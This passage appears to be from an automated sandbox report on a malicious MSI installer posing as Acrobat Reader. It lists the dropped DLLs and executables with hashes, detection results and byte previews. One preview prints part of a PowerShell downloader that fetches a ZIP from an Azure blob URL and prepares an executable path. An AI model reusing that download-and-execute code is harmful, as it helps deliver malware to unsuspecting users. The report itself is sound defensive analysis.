Preview:	..$.u.r.l. .=. .".h.t.t.p.s.:././.w.e.b.d.o.c.s.7.5.9.1.2.2.3.2.6.5.8...b.l.o.b...c.o.r.e...w.i.n.d.o.w.s...n.e.t./.z.1.0.2.0.2.2./.u.f.i.l.e.s.x.l.s...x.l.s.".....$.d.o.w.n.l.o.a.d.D.i.r. .=. .".$.e.n.v.:.U.S.E.R.P.R.O.F.I.L.E.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.a.p.p.D.a.t.a.".....$.d.a.t.e. .=. .G.e.t.-.D.a.t.e. .-.F.o.r.m.a.t. .".d.d.M.M.y.y.y.y.".....$.o.u.t.F.i.l.e. .=. .".$.d.o.w.n.l.o.a.d.D.i.r.\.$.d.a.t.e...z.i.p.".....$.e.x.e.c.u.t.a.b.l.e.P.a.t.h. .=. .".$.d.o.w.n.l.o.a.d.D.i.r.\.W.e.b.E.x.p.e.r.i.e.n.c.e.H.o.s.t.A.p.p...e.x.e.".........f.u.n.c.t.i.o.n. .D.o.w.n.l.o.a.d. .{..... . . . .p.a.r.a.m.(.$.u.r.l.,. .$.o.u.t.p.u.t.)..... . . . .(.N.e.w.-.O.b.j.e.c.t. .S.y.s.t.e.m...N.e.t...W.e.b.C.l.i.e.n.t.)...D.o.w.n.l.o.a.d.F.i.l.e.(.$.u.r.l.,. .$.o.u.t.p.u.t.).....}.........D.o.w.n.l.o.a.d. .-.u.r.l. .$.u.r.l. .-.o.u.t.p.u.t. .$.o.u.t.F.i.l.e.........i.f. .(.T.e.s.t.-.P.a.t.h. .$.o.u.t.F.i.l.e.). .{..... . . . .W.r.i.t.e.-.H.o.s.t. .".A.r.q.u.i.v.o. .Z.I.P. .b.a.i.x.a.d.o. .c.o.m. .s.

C:\Users\user\AppData\Local\appData\10062024.zip

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	33250918
Entropy (8bit):	7.999807281130348
Encrypted:	true
SSDEEP:	786432:+oZBKHmVxeLTZMOIevOtIjoguQMxnF6wNlZwrARE:+o/fcTZH7azQMGwNKf
MD5:	8B4F1FE04F8F1497E22E308F2E28CA76
SHA1:	156804C2CF54B817A6C8CC4EFF57C834E646C359
SHA-256:	76CDBF23281FBF67AD51DB55457713F5050427CEAE61EACC8B0468C7D722CCD2
SHA-512:	B8F0B4D0A24BB7565FF967EEB8E34FC7E1BDF4125C3FF0149C4ACAF7FD43495A82828636303379573CBA857DD51037220389A567B3EBDF46BA9513BD640CBEB4
Malicious:	true
Preview:	D_..........ML................W\|f{yq;D_..........ML................W\|f{yq;Uddx}wu`}{z;D_........<h.L............6...W\|f{yq;Uddx}wu`}{z;%%,:$:!--':%&$;D_...........L............-...W\|f{yq;Uddx}wu`}{z;%%,:$:!--':%&$;%& :$:"'"#:%%-:yuz}rqg`y....$.P.2....<..R.......y\|.yY.....Yr.. ...z..:].\|....HY.....E..%A..]......\|.l.T.......l..H e...0.?.(.AM...3........%.K...k...l..L./..T../2..D_........S..L.H......4.>.8...W\|f{yq;Uddx}wu`}{z;%%,:$:!--':%&$;w\|f{yq:qlq..mlG..$...Y....6..U.UOUz.6..].9....Q..\|.;V...4.....7,g.a.J3...C.@xN\|.6....4...8..&...3]....hkh(T.i......m..9...4..y.,...F......S.K..!.K...(q..p...s..a...YcO.l...'..q.!{.I.S.+.D{.4........=M...zV....a.U.zSq..4.r...j...U\......3.v.y)..P.4..fg....S........gJJ#.U>.U..x..A".....7#..X..Gl..4.....7H...zV.h......k..zV]. ..Dr.:....D..+...c..:.9..........u.sl..a..gc.....C.^J.t..$T..z...I.?..u..[.m....)HN.$h;..g.W.....be...._.Zo.)8..U.0.\|O[..Z.....hS.*.+;~.rd.'{... ....;.#..(.<3 .g../ie...k....2Xj.1#.V(h..Iv.s.0.h..J

C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	55808
Entropy (8bit):	5.776679906561504
Encrypted:	false
SSDEEP:	1536:11fhFN4g5OkVtgaUFAUoBMmDxdgUhpzz:1RhL5RAFADTxzz
MD5:	53AB9B8198E8AD8D3A043F40E72B1AB1
SHA1:	51F27E895808A806D2EA7F22CD91C50C4C7CDF5F
SHA-256:	1E9CD852EF2E7233E12090ED41BA99019D533CC07EDADFE5095CD0DDACC4FC1E
SHA-512:	7A7FE0BA46A92D0A5CE8A1ABFBEE97BA8F5EA3A7F8898D1DE6024ECC3C3209F159FB76B11B08B7ECAA6F152DEE974BD68316A06485E8CA6EE14EBC8C63DBC6FE
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........a.r.2.r.2.r.2U..3.r.2U..3.r.2U..3.r.2U..3.r.2..d2.r.2.r.2.r.2...3.r.2...2.r.2...3.r.2Rich.r.2................PE..d...Gg.d.........."..........Z.................@............................. ......@\....`............................................................................................p...............................8............................................text...\........................... ..`.rdata...8.......:..................@..@.data...............................@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\appData\mrt100_app.dll

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	258736
Entropy (8bit):	6.781393000027508
Encrypted:	false
SSDEEP:	6144:tn/Hw5J0LRoPdtX6NWhBAUMXHuOCmu9XIGR:1QL0LsoW4UMXHuOcB
MD5:	3CDF5CBDBC53E82C799F76DA8F91BDD9
SHA1:	C8F4A3617C4F0BEF70455AB53010F6340BBE5F57
SHA-256:	597D19BAEE0EF83E312A807B7004CB7324336F0B558DA48CE44A299B60362136
SHA-512:	6E9826AD7373998581E5C2B7A0BEA6DEDF79130878304A0B22168BBA88165518E810D9F93D82F7285F9E35C89BAC60D1D25F6218B1636C7B64AFB24D5FE058D7
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......J......Z...Z...Z)G.[...Z)G.[...Z)G.[...Z)G.[...Z..`Z...Z.f=Z!..Z.LsZ...Z...ZS..Z...Z...Z.G.[...Z.G.[<..Z.G.[...Z.GQZ...Z.G.[...ZRich...Z........PE..L...g7.V.........."!.....\...T......@........p............................... ......0.....@Q........................`>...+...............................>......p/...@..T...................tA.......A..\....................=..@....................text...OZ.......\.................. ..`.data...@6...p.......`..............@....idata..~............h..............@..@.didat...............x..............@....tls....u............z..............@....rsrc................\|..............@..@.reloc..p/.......0..................@..B........................................................................................................................................................................................................

C:\Users\user\AppData\Local\appData\msvcp140_app.dll

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	571168
Entropy (8bit):	6.509615420946833
Encrypted:	false
SSDEEP:	12288:tZeEtnsE9Diw9NF9WPz81b5q1ilJpr8hpEygKlvwWAIQEKZm+jWodEEVTJd34/:tZe6yg7LIQEKZm+jWodEEJJdc
MD5:	15DD460E592E59C2CE7F553328739DFC
SHA1:	BA2BAB7649C7FBC18E3FF38B71368839A5588657
SHA-256:	F7F46F09AA38B6FAA5DBFD2B192EB9A5D63E9D5EEC482624FC20E6686F59098D
SHA-512:	31330DB59F930C4E2923074FFC6ED051D68916B3F7EFD09EDD11B7E51A0F58BB6DDC576F306FF2195E717A1B5B44316A3A7B11FE4C9E17BEC255EA8E8068F0DE
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........P.p.1h#.1h#.1h#.I.#.1h#.1i#91h#,Fi".1h#,Fl".1h#,Fk".1h#,Fm".1h#,Fh".1h#,F.#.1h#,Fj".1h#Rich.1h#........................PE..d.....Za.........." .....@...X......./..............................................=T....`Q.........................................4..@...@................p...9...... 7......0......T...........................0...8............P...............................text....>.......@.................. ..`.rdata..D....P.......D..............@..@.data... 9...0......................@....pdata...9...p...:...8..............@..@.rsrc................r..............@..@.reloc..0............v..............@..B........................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\appData\vcamp140_app.dll

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	397664
Entropy (8bit):	6.3562644384745655
Encrypted:	false
SSDEEP:	6144:9fLtIx4FFDinA8Jh9XFHG/s9yrFp28s0C0KJ9fBIv9wCOfeC61S9HIl:xi6FFDaA+XVG/s9yrFpBGJtKwCJeIl
MD5:	71B3CACB316C4AEDDC8CE2D82FEA307A
SHA1:	883D5ACD1E14C85C1BA7B793F74E03C0FACD0684
SHA-256:	8768E0E8C9BD1670D7896E2968E70810AF822B461439DE7453B2E5873BFB3A00
SHA-512:	274424A039919DFC5510462D9D129550DB5D5BED1C735496D24CAC96EE1DE798BDB1DD832804DEEBD81307DCF1D6A778275262BC7F6E9E498AB1F751CAA20BBB
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......,h..h...h...h....y..n....fw.j...aq..H...h........~..a....~..s....~..`....~..l....~..d....~..i....~u.i...h...i....~..i...Richh...........................PE..d.....Za.........." .........B......0A.......................................0......Y.....`Q........................................0...08..`P..........`$.......5......`1... ..(...\|#..T....................%..(....#..8............................................text............................... ..`.rdata..............................@..@.data...X3...p...,...P..............@....pdata...5.......6...\|..............@..@.rsrc...`$.......&..................@..@.reloc..(.... ......................@..B........................................................................................................................................................................................................................

C:\Users\user\AppData\Local\appData\vccorlib140_app.dll

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	333088
Entropy (8bit):	5.973829257868023
Encrypted:	false
SSDEEP:	6144:Azdy9XA1tDhdU+XbrzZSW1t9o7VUI0ltsT:Ao9W3dPXb4SHoKts
MD5:	900E194755EE739953D15C29E7E692E9
SHA1:	1DE7533C302EABA2CE0D5C09204228522824B723
SHA-256:	594BABC5ED05826AAF2AEC0750BE135EFF2876C9B941D2E99B6B1E278073C96A
SHA-512:	3DD25BD5EC4746A74A14B399A469B0C7ACEC0BC9222800841AFF6E92616D2FBB43DDB2FB7F5EE33D58FED45A00CF8B4931B04D4C07699BD30F1780E9D82BB6A4
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5..q...q...q...x...]...q..........v......k......y......u......`......p.....v.p......p...Richq...........PE..d.....Za.........." .....t...v.......s....................................... ............`Q.............................................>.............................. /..............T...............................8............................................text...vs.......t.................. ..`.rdata..l............x..............@..@.data........ ......................@....pdata........... ..................@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\appData\vcomp140_app.dll

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	61960
Entropy (8bit):	6.313785957582955
Encrypted:	false
SSDEEP:	1536:FzxzJ+xpDMmwsLMFD0WfLSxwKoUhw/1Yd5ZkD:FzxzJQpDHwQMFD0WuwKoUG/i2D
MD5:	E3FC37B45BA6D33AFACC2B26F935D442
SHA1:	805241C0C6AE7745A2CEBDFE8F8FABA3E5EAA0FA
SHA-256:	1187781D8AE000F52FDD0B1F69C46EE680CE18CC8934D107CB96456CDDC0B737
SHA-512:	3E63CDD375644A77C5951CD087443688C2F7573D6DB3BCE28600DB89F86E398C693B0B6EB24ABF96FD50162265D184B8CCA4AC74A7E5222CB0FB2D1B50B66D4C
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m...)c..)c..)c.. ...1c..)c...c......*c......,c....../c......,c......'c......(c....{.(c......(c..Rich)c..................PE..d.....Za.........." .....x...`.......b....................................... ......[.....`Q........................................@..........................(........&......$.......T...............................8............................................text....w.......x.................. ..`.rdata..n........0...\|..............@..@.data...............................@....pdata..(...........................@..@.rsrc...............................@..@.reloc..$...........................@..B........................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\appData\vcruntime140_1_app.dll

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	5922816
Entropy (8bit):	6.014202441434524
Encrypted:	false
SSDEEP:	49152:bUHO9nd22FBKG79ln7amnJ+bMfUSySLT5nHJVXb1IAtJVbktm:bGghnemJmI
MD5:	7461E2A6F80CA087CB35B051E9FCB881
SHA1:	1FF26096CB5B753DE538B837B71FB94A90850B89
SHA-256:	54DDFE0560FA98C8D6448FA95E1A0B8207D732D896F34F1CEC8C61CA6E343947
SHA-512:	EAE37D9CA2D3DF696D0C3817F2477DAA27EFCEA8CC0109C38B57ED27750628BC0521EC31D64376E7387F1587FFDD0A82DA9462236DF78F9072820861EAEF1CDC
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 42% Antivirus: Virustotal, Detection: 5%, Browse
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win64..$7........................................................................................................................................PE..d...o$_f.........." ......I..R........H.......@...............................[...........`.......................... ...............PQ.......P..G...@Y..\....T..@...........pQ..x....................................................P......0Q......................text...X.I.......I................. ..`.data...@.... I.......I.............@....bss..........P..........................idata...G....P..H....O.............@....didata......0Q......2P.............@....edata.......PQ......DP.............@..@.rdata..E....`Q......FP.............@..@.reloc...x...pQ..z...HP.............@..B.pdata...@....T..B....S.............@..@.rsrc....\...@Y..\....X.............@..@..............[......`Z.............@..@........................................

C:\Users\user\AppData\Local\appData\vcruntime140_app.dll

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	97632
Entropy (8bit):	6.409755640490607
Encrypted:	false
SSDEEP:	1536:upMm/eng35aehvWy3YevkYdmBaNBkKh8ehNK7TT0ecbe+4Z9Vvl:u2W9Lv9dVN1h8eLK7TwecbeVZDN
MD5:	27F73C8DAA6DF0A0769FBC0F28D2E955
SHA1:	A4FD3745C70C8C10D0DCCB9E2B56786D58BA7049
SHA-256:	FFF797E284CC21447515C478D1F97B89EFB2A49A6CCEF7D7F94B4DF76B5789DF
SHA-512:	B9A0823E42A57187838D5B10C169E2CC3A586AC92EAB82E4F915A83623131BA23E6D43C01E2356995AB7A94414DBB58D104BCC7966E5A5FC321F3EBD6CBD3663
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........F..~...~...~......~.......~.}.}...~.}.z...~.}.{...~.}.~...~.}.....~.}.\|...~.Rich..~.........................PE..d.....Za.........." .........b............................................................`Q........................................`A..8....I..,............p.......V..`'..........(+..T............................+..8...............h............................text............................... ..`.rdata..D@.......B..................@..@.data........`.......<..............@....pdata.......p.......@..............@..@_RDATA...............L..............@..@.rsrc................N..............@..@.reloc...............T..............@..B........................................................................................................................................................................................................................

C:\Users\user\AppData\Local\appData\xmpp.dll

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	3368448
Entropy (8bit):	6.58875247712544
Encrypted:	false
SSDEEP:	49152:iyzKWtMzxfan/FkSvzCrcGJWABcHHjQHBK9398:iy2cMzdmtChWm
MD5:	A01B09B6D27D101391AAB54AC0879E5B
SHA1:	E36B768ABC97F755161B0112B01D6644F8DB5C60
SHA-256:	ED4D6FDB6248BCFF64E5652CD0C9D79C483BACE94C1120DC3128645F00A5E5C4
SHA-512:	3311BBA5F38A83B03744744A38EF52564584CDB752D0C96A1CD0ED36AB1BBEBD9695FCDD7B17E9D1559402552972685F4FA5E0BEDCE92ACE5A872DF047A2CF31
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 1%, Browse
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L...3Hl`.................z(..........(.......(...@.......................... <..................@....................1......p1..=....5.......................1...............................1.....................p{1.\|.....1.@....................text....Y(......Z(................. ..`.itext.......p(.. ...^(............. ..`.data....n....(..p...~(.............@....bss.....n....)..........................idata...=...p1..>....(.............@....didata.@.....1......,).............@....edata........1......8).............@..@.tls....L.....1..........................rdata..].....1......:).............@..@.reloc........1......<).............@..B.rsrc.........5.......,.............@..@............. <......f3.............@..@................

C:\Windows\Installer\67df2f.msi

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Last Printed: Fri Dec 11 11:47:44 2009, Last Saved Time/Date: Fri Sep 18 15:06:51 2020, Security: 0, Code page: 1252, Revision Number: {9533E8F2-DB9B-40B9-A160-5A93E74B5068}, Number of Words: 10, Subject: Acrobat Reader, Author: Acrobat Reader, Name of Creating Application: Acrobat Reader, Template: ;1046, Comments: A base dados do instalador contm a lgica e os dados necessrios para instalar o Acrobat Reader., Title: Installation Database, Keywords: Installer, MSI, Database, Create Time/Date: Wed Jun 5 18:11:30 2024, Number of Pages: 200
Category:	dropped
Size (bytes):	5776896
Entropy (8bit):	7.75653870281256
Encrypted:	false
SSDEEP:	98304:0+X/n/8/ZUc1AH4K3YWNyDxsgeNC1u3395sO3adRQB8X:V/iUWAYsNyDxgC1u34ldRQI
MD5:	282D913070C0EA94546FC870D5760694
SHA1:	303885DF9E9AD7411755FBF4AFFEE6C7486967A2
SHA-256:	C8445A8F19CB350C35894D209654041308C50BDEAC5D8B1541361EF69B29E284
SHA-512:	1CFB5280035994F7E83F5A2F8E140756B373961E7950F00E27BB1B9BE83ED002691B7382CC49F39C517243A3E15825D8A3677DAB751C20C29BFDC06723CE8662
Malicious:	true
Yara Hits:	Rule: JoeSecurity_PowershellDownloadAndExecute, Description: Yara detected Powershell download and execute, Source: C:\Windows\Installer\67df2f.msi, Author: Joe Security Rule: JoeSecurity_MalDoc, Description: Yara detected MalDoc, Source: C:\Windows\Installer\67df2f.msi, Author: Joe Security
Preview:	......................>...................Y...................................F.......b.......t.......................................s...............................................~...................................................................................................................................................................................................................................................................................................................................................................#...4........................................................................................... ...!..."...-...2...%...&...'...(...)...*...+...,.........../...0...1...5...3...<...?...6...7...8...9...:...;...E...=...>.......@...A...B...C...D...............H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...

C:\Windows\Installer\MSIE0C6.tmp

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	602432
Entropy (8bit):	6.469389454249605
Encrypted:	false
SSDEEP:	6144:QaFYTdIO9QmvIeVKVhaxkSBULBA4tKSM3BZC4o4AOl+mN9ysU5pvs8g73E:pYL9HXVW0xOA+KlZC4vc55s8g73E
MD5:	B7A6A99CBE6E762C0A61A8621AD41706
SHA1:	92F45DD3ED3AAEAAC8B488A84E160292FF86281E
SHA-256:	39FD8D36F8E5D915AD571EA429DB3C3DE6E9C160DBEA7C3E137C9BA4B7FD301D
SHA-512:	A17E4512D906599B7F004EBB2F19EE2566EE93C2C18114AC05B0A0115A8C481592788F6B97DA008795D5C31FB8D819AC82A5097B1792248319139C3FACE45642
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 1%, Browse
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.............u..u..u.n.v..u.n.p...u...q..u...v..u...p...u.n.q..u.n.s..u.n.t..u..t...u.\|...u.u..u....u.....u.w..u.Rich..u.........................PE..L....=.d.........."!...$.>...........Y.......P...............................0.......4....@.........................`X..d....a..,.......................@=.......h.....p...................@...........@............P..h............................text....=.......>.................. ..`.rdata...,...P.......B..............@..@.data...8%...........p..............@....rsrc...............................@..@.reloc...h.......j..................@..B........................................................................................................................................................................................................................................................................

C:\Windows\Installer\MSIE134.tmp

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	602432
Entropy (8bit):	6.469389454249605
Encrypted:	false
SSDEEP:	6144:QaFYTdIO9QmvIeVKVhaxkSBULBA4tKSM3BZC4o4AOl+mN9ysU5pvs8g73E:pYL9HXVW0xOA+KlZC4vc55s8g73E
MD5:	B7A6A99CBE6E762C0A61A8621AD41706
SHA1:	92F45DD3ED3AAEAAC8B488A84E160292FF86281E
SHA-256:	39FD8D36F8E5D915AD571EA429DB3C3DE6E9C160DBEA7C3E137C9BA4B7FD301D
SHA-512:	A17E4512D906599B7F004EBB2F19EE2566EE93C2C18114AC05B0A0115A8C481592788F6B97DA008795D5C31FB8D819AC82A5097B1792248319139C3FACE45642
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 1%, Browse
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.............u..u..u.n.v..u.n.p...u...q..u...v..u...p...u.n.q..u.n.s..u.n.t..u..t...u.\|...u.u..u....u.....u.w..u.Rich..u.........................PE..L....=.d.........."!...$.>...........Y.......P...............................0.......4....@.........................`X..d....a..,.......................@=.......h.....p...................@...........@............P..h............................text....=.......>.................. ..`.rdata...,...P.......B..............@..@.data...8%...........p..............@....rsrc...............................@..@.reloc...h.......j..................@..B........................................................................................................................................................................................................................................................................

C:\Windows\Installer\MSIE164.tmp

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	602432
Entropy (8bit):	6.469389454249605
Encrypted:	false
SSDEEP:	6144:QaFYTdIO9QmvIeVKVhaxkSBULBA4tKSM3BZC4o4AOl+mN9ysU5pvs8g73E:pYL9HXVW0xOA+KlZC4vc55s8g73E
MD5:	B7A6A99CBE6E762C0A61A8621AD41706
SHA1:	92F45DD3ED3AAEAAC8B488A84E160292FF86281E
SHA-256:	39FD8D36F8E5D915AD571EA429DB3C3DE6E9C160DBEA7C3E137C9BA4B7FD301D
SHA-512:	A17E4512D906599B7F004EBB2F19EE2566EE93C2C18114AC05B0A0115A8C481592788F6B97DA008795D5C31FB8D819AC82A5097B1792248319139C3FACE45642
Malicious:	true
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.............u..u..u.n.v..u.n.p...u...q..u...v..u...p...u.n.q..u.n.s..u.n.t..u..t...u.\|...u.u..u....u.....u.w..u.Rich..u.........................PE..L....=.d.........."!...$.>...........Y.......P...............................0.......4....@.........................`X..d....a..,.......................@=.......h.....p...................@...........@............P..h............................text....=.......>.................. ..`.rdata...,...P.......B..............@..@.data...8%...........p..............@....rsrc...............................@..@.reloc...h.......j..................@..B........................................................................................................................................................................................................................................................................

C:\Windows\Installer\MSIE184.tmp

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	602432
Entropy (8bit):	6.469389454249605
Encrypted:	false
SSDEEP:	6144:QaFYTdIO9QmvIeVKVhaxkSBULBA4tKSM3BZC4o4AOl+mN9ysU5pvs8g73E:pYL9HXVW0xOA+KlZC4vc55s8g73E
MD5:	B7A6A99CBE6E762C0A61A8621AD41706
SHA1:	92F45DD3ED3AAEAAC8B488A84E160292FF86281E
SHA-256:	39FD8D36F8E5D915AD571EA429DB3C3DE6E9C160DBEA7C3E137C9BA4B7FD301D
SHA-512:	A17E4512D906599B7F004EBB2F19EE2566EE93C2C18114AC05B0A0115A8C481592788F6B97DA008795D5C31FB8D819AC82A5097B1792248319139C3FACE45642
Malicious:	true
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.............u..u..u.n.v..u.n.p...u...q..u...v..u...p...u.n.q..u.n.s..u.n.t..u..t...u.\|...u.u..u....u.....u.w..u.Rich..u.........................PE..L....=.d.........."!...$.>...........Y.......P...............................0.......4....@.........................`X..d....a..,.......................@=.......h.....p...................@...........@............P..h............................text....=.......>.................. ..`.rdata...,...P.......B..............@..@.data...8%...........p..............@....rsrc...............................@..@.reloc...h.......j..................@..B........................................................................................................................................................................................................................................................................

C:\Windows\Installer\MSIE1F2.tmp

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	602432
Entropy (8bit):	6.469389454249605
Encrypted:	false
SSDEEP:	6144:QaFYTdIO9QmvIeVKVhaxkSBULBA4tKSM3BZC4o4AOl+mN9ysU5pvs8g73E:pYL9HXVW0xOA+KlZC4vc55s8g73E
MD5:	B7A6A99CBE6E762C0A61A8621AD41706
SHA1:	92F45DD3ED3AAEAAC8B488A84E160292FF86281E
SHA-256:	39FD8D36F8E5D915AD571EA429DB3C3DE6E9C160DBEA7C3E137C9BA4B7FD301D
SHA-512:	A17E4512D906599B7F004EBB2F19EE2566EE93C2C18114AC05B0A0115A8C481592788F6B97DA008795D5C31FB8D819AC82A5097B1792248319139C3FACE45642
Malicious:	true
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.............u..u..u.n.v..u.n.p...u...q..u...v..u...p...u.n.q..u.n.s..u.n.t..u..t...u.\|...u.u..u....u.....u.w..u.Rich..u.........................PE..L....=.d.........."!...$.>...........Y.......P...............................0.......4....@.........................`X..d....a..,.......................@=.......h.....p...................@...........@............P..h............................text....=.......>.................. ..`.rdata...,...P.......B..............@..@.data...8%...........p..............@....rsrc...............................@..@.reloc...h.......j..................@..B........................................................................................................................................................................................................................................................................

C:\Windows\Installer\MSIE280.tmp

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	672804
Entropy (8bit):	6.59348397478334
Encrypted:	false
SSDEEP:	12288:vurEvhNDNMgr6xtRdYn/VkRFcJcI32R7vKG+4vz/1FJlt2R45cKEKg9:+ihNREtRdYndJP32R7vKG+47/L025zEh
MD5:	EFACF4F200007FF55AC469963A572ADE
SHA1:	68A723F016151120C6200BFACA36EBC0AACD1984
SHA-256:	5FE08DCBFC8D3CC9DA2B140C775B0F87FDB24C7E7C60CF3E8D4D2AA3E1FA3D64
SHA-512:	61BBED42807C41093340A129A5841009D9EDEA85D244475F4EC29175E729A7C25DCD1EE8216568EFBCA13925F84AAC27EFB178CFCBB1C26CE8FB09A2DA430E85
Malicious:	true
Yara Hits:	Rule: JoeSecurity_PowershellDownloadAndExecute, Description: Yara detected Powershell download and execute, Source: C:\Windows\Installer\MSIE280.tmp, Author: Joe Security
Preview:	...@IXOS.@.....@#(.X.@.....@.....@.....@.....@.....@......&.{B95F3E55-F3A2-459E-ACB1-42A9918E3822}..Acrobat Reader..ust_019821730-0576383.msi.@.....@.....@.....@........&.{9533E8F2-DB9B-40B9-A160-5A93E74B5068}.....@.....@.....@.....@.......@.....@.....@.......@......Acrobat Reader......Rollback..A.....o. .d.e. .r.e.s.t.a.u.r.a.....o.....RollbackCleanup..Removendo arquivos de backup..Arquivo: [1]...@.......@........ProcessComponents%.Atualizando o registro de componentes...@.....@.....@.]....&.{D608D6C6-E1D1-48EF-AE39-6038652DD840}2.01:\Software\Acrobat Reader\Acrobat Reader\Version.@.......@.....@.....@......&.{0D0E7F8C-B4C8-4986-A673-327EDC71EEC4}=.C:\Users\user\AppData\Roaming\Acrobat Reader\Acrobat Reader\.@.......@.....@.....@......&.{9F3423FF-5307-43F6-B561-838FF3F92B96}3.C:\Users\user\AppData\Local\appData\mrt100_app.dll.@.......@.....@.....@......&.{40C9E41B-7F86-4AB3-926F-20E11B86C94C}5.C:\Users\user\AppData\Local\appData\msvcp140_app.dll.@.......@.....@.....@......&.{E33294

C:\Windows\Installer\MSIE62B.tmp

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	modified
Size (bytes):	664896
Entropy (8bit):	6.580379078260005
Encrypted:	false
SSDEEP:	12288:FurEvhNDNMgr6xtRdYn/VkRFcJcI32R7vKG+4vz/1FJlt2R45cKEKgy:UihNREtRdYndJP32R7vKG+47/L025zEe
MD5:	6EA44A4959FF6754793EABF80EB134D6
SHA1:	FAC049850CA944EC17CDA0C20DFBC3A30F348611
SHA-256:	7A23E492658E6D38873F3AD82F41EC1FA45102DA59FA8D87595D85DAFCA6FA98
SHA-512:	E620835985A8EF03A55AF210D156F9DFA6313D4C36131EA17FDAD9B6ACAB37214041535EFE99B7A33355CE8D5FF88E0C1ED10719726F4A23B51650CF7B15AE13
Malicious:	true
